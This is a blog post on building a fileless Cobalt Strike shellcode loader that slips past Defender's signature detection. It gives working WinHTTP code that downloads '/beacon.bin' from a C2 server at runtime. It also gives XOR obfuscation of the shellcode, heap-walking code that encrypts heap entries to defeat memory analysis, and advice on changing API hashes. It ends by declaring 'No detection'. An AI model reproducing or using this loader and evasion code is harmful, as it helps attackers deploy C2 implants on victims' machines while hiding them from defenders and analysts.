Recently I was developing a simple Shellcode Loader which uses Callbacks as an alternative method of Shellcode execution. While it bypassed all runtime scanning, it failed to bypass signature detection. So I fired up ThreatCheck to identify the bad bytes:
At first glance, it is impossible to understand what exactly is getting detected, so I fired up Ghidra to manually identify these bad bytes. I simply copied a random pattern from the ThreatCheck output (00 1F CC 07 00 15 CC 07) and searched for it in the memory of the compiled EXE of the malware.
This is clearly the XORed Shellcode I embedded in my Shellcode Loader, and it’s getting detected as a Cobalt Strike agent by Defender. It seems the XOR encryption routine is not strong enough against static detection, and that got me thinking: are stored shellcodes really dead (especially the ones generated from Cobalt Strike)? I wouldn’t be surprised, as Cobalt Strike is currently the most popular C2 framework among threat actors, but something must be done to make the Shellcode great and undetectable again.
RAW Shellcodes: What’s wrong with them?
Cobalt Strike’s payloads are based on Meterpreter shellcode and share many similarities with it, including similar (sometimes identical) API hashing in both the x86 and x64 versions.
The default hashes that Cobalt Strike uses are heavily signatured; we can work around this by encoding the hashes dynamically. If you look at the image below, the hash value 0xa779563a is the default hash of InternetOpenA. If you simply google the hash, everything related to Metasploit will show up, so this hash is known to be mostly used by Cobalt Strike beacons and Meterpreter agents. Applying ror13 hashing to such hashes will drastically reduce the detection by AV vendors (to almost 0). As this is already nicely explained in this article, I’m not going to explain it much further, but the photo below gives the idea of the final result after encoding the hashes.
Fileless Shellcode to the rescue
Although it is not a new thing, a good way of avoiding signature detection is to go fileless and retrieve the shellcode from the internet at runtime. This way you solve the problem of high entropy as well as any possible signature detection of a stored payload. The photo below compares a traditional XOR-encrypted shellcode loader with our fileless shellcode loader. Since the shellcode doesn’t have to be stored in the .text section, the entropy will decrease drastically (remember that ):
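If you want to check an entropy claim like this yourself, a minimal sketch of a Shannon entropy calculation (bits per byte) is shown here. The function name shannon_entropy is hypothetical and not part of the original source; the sketch only measures a byte buffer that you pass in, such as the contents of a compiled binary read from disk.

```cpp
#include <array>
#include <cmath>
#include <cstddef>
#include <cstdint>
#include <vector>

// Hypothetical helper (not from the original source).
// Returns the Shannon entropy of the buffer in bits per byte:
// 0.0 for constant data, 8.0 for perfectly uniform byte values.
double shannon_entropy(const std::vector<std::uint8_t>& data) {
    if (data.empty()) return 0.0;

    // Count how often each of the 256 possible byte values occurs.
    std::array<std::size_t, 256> counts{};
    for (std::uint8_t b : data) ++counts[b];

    // Sum -p * log2(p) over every byte value that actually occurs.
    const double total = static_cast<double>(data.size());
    double entropy = 0.0;
    for (std::size_t c : counts) {
        if (c == 0) continue;
        const double p = static_cast<double>(c) / total;
        entropy -= p * std::log2(p);
    }
    return entropy;
}
```

Encrypted or compressed blobs tend to score close to 8, while ordinary code and text score noticeably lower, which is why a large embedded encrypted payload raises the overall figure.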
The full source code can be found here, but in this article I will try to break down the code for the sake of understanding.
In order to request the shellcode from the HTTP server, I will be using the winhttp library. Alternatively, you can use sockets; based on some research, this might be a better solution that results in lower runtime detection (as probably the Winsock API will get hooked). The code below is responsible for sending an HTTP request to the remote server and waiting for the response:
// Initialize WinHTTP
hInternet = WinHttpOpen(NULL, WINHTTP_ACCESS_TYPE_DEFAULT_PROXY, WINHTTP_NO_PROXY_NAME, WINHTTP_NO_PROXY_BYPASS, 0);
// Connect to the HTTP server
hHttpSession = WinHttpConnect(hInternet, L"192.168.0.60", 80, 0); //192.168.0.60:8081
// Open an HTTP request
hHttpRequest = WinHttpOpenRequest(hHttpSession, L"GET", L"/beacon.bin", NULL, WINHTTP_NO_REFERER, WINHTTP_DEFAULT_ACCEPT_TYPES, 0);
// Send a request
bResults = WinHttpSendRequest(hHttpRequest, WINHTTP_NO_ADDITIONAL_HEADERS, 0, WINHTTP_NO_REQUEST_DATA, 0, 0, 0);
// Wait for the response
bResults = WinHttpReceiveResponse(hHttpRequest, NULL);
WinHTTP receives the response in chunks, so we need to loop until everything is retrieved:
do
{
    // Check how much data is available.
    dwSize = 0;
    if (!WinHttpQueryDataAvailable(hHttpRequest, &dwSize))
    {
        printf("Error %u in WinHttpQueryDataAvailable.\n", GetLastError());
        break;
    }
    // No more available data
    if (dwSize == 0)
        break;
    // Allocate space for the buffer.
    pszOutBuffer = new char[dwSize + 1];
    // Read the data.
    ZeroMemory(pszOutBuffer, dwSize + 1);
    if (!WinHttpReadData(hHttpRequest, (LPVOID)pszOutBuffer, dwSize, &dwDownloaded))
        printf("Error %u in WinHttpReadData.\n", GetLastError());
    else
        PEbuf.insert(PEbuf.end(), pszOutBuffer, pszOutBuffer + dwDownloaded);
    // Free the chunk buffer now that its contents have been copied.
    delete[] pszOutBuffer;
} while (dwSize > 0);
Each chunk is appended to a vector (PEbuf above). Lastly, copy the collected bytes into a single buffer:
char* PE = (char*)malloc(PEbuf.size());
for (size_t i = 0; i < PEbuf.size(); i++) {
    PE[i] = PEbuf[i];
}
There is always place for encryption
Notice the following part:
char* PE = (char*)malloc(PEbuf.size());
for (size_t i = 0; i < PEbuf.size(); i++) {
    PE[i] = PEbuf[i];
}
The shellcode retrieved from the teamserver is stored in the heap, making it easy for the blue team to analyze the heap and discover what’s inside (clearly our unencrypted shellcode):
For that reason, encrypting the shellcode while it sits in the heap is always a better idea:
char* PE = (char*)malloc(PEbuf.size());
for (size_t i = 0; i < PEbuf.size(); i++) {
    PE[i] = PEbuf[i] ^ 0x7e; // XOR encrypted
}
// XOR again with the same key to decrypt in place
XOR(PE, PEbuf.size(), key);
Where XOR is a basic function which decrypts the array:
void XOR(char* data, int len, unsigned char key) {
    int i;
    for (i = 0; i < len; i++)
        data[i] ^= key;
}
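Because XOR is its own inverse, the same routine both encodes and decodes: running it twice with the same key gives back the original bytes. A minimal sketch that checks this on a harmless string follows. The names xor_buffer and xor_round_trip are hypothetical and not part of the original source.

```cpp
#include <cassert>
#include <cstddef>
#include <string>

// Hypothetical stand-in for the XOR() routine above, using size_t for the length.
void xor_buffer(char* data, std::size_t len, unsigned char key) {
    assert(data != nullptr || len == 0);
    for (std::size_t i = 0; i < len; ++i)
        data[i] = static_cast<char>(data[i] ^ key);
}

// Returns true when a single pass changes the input
// and a second pass with the same key restores it.
bool xor_round_trip(const std::string& original, unsigned char key) {
    std::string work = original;

    xor_buffer(&work[0], work.size(), key);  // first pass: encode
    const bool changed = (work != original);

    xor_buffer(&work[0], work.size(), key);  // second pass: decode
    return changed && work == original;
}
```

Note that a key of 0x00 leaves every byte unchanged, so xor_round_trip reports false for it: the data was never actually encoded.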
Protect the heap at all costs
Encrypting the heap is a good idea because it protects sensitive data that could be stored in the heap. This is especially important when a program is running in an untrusted environment, as any data stored in the heap could be analyzed by a malware analyser.
// Encryption Key
const char key[2] = "A";
size_t keySize = sizeof(key);

void xor_bidirectional_encode(const char* key, const size_t keyLength, char* buffer, const size_t length) {
    for (size_t i = 0; i < length; ++i) {
        buffer[i] ^= key[i % keyLength];
    }
}

PROCESS_HEAP_ENTRY entry;

void HeapEncryptDecrypt() {
    SecureZeroMemory(&entry, sizeof(entry));
    while (HeapWalk(GetProcessHeap(), &entry)) {
        if ((entry.wFlags & PROCESS_HEAP_ENTRY_BUSY) != 0) {
            xor_bidirectional_encode(key, keySize, (char*)(entry.lpData), entry.cbData);
        }
    }
}
The HeapWalk() function iterates through each entry in the process heap, and the wFlags field tells us whether the entry is busy (allocated). If it is busy, xor_bidirectional_encode() XORs its contents with the key. Because XOR is its own inverse, the same call both encrypts and decrypts: calling HeapEncryptDecrypt() a second time restores the original data.
Profit
- Entropy is drastically reduced.
- Heap is protected.
- No detection (Profit!)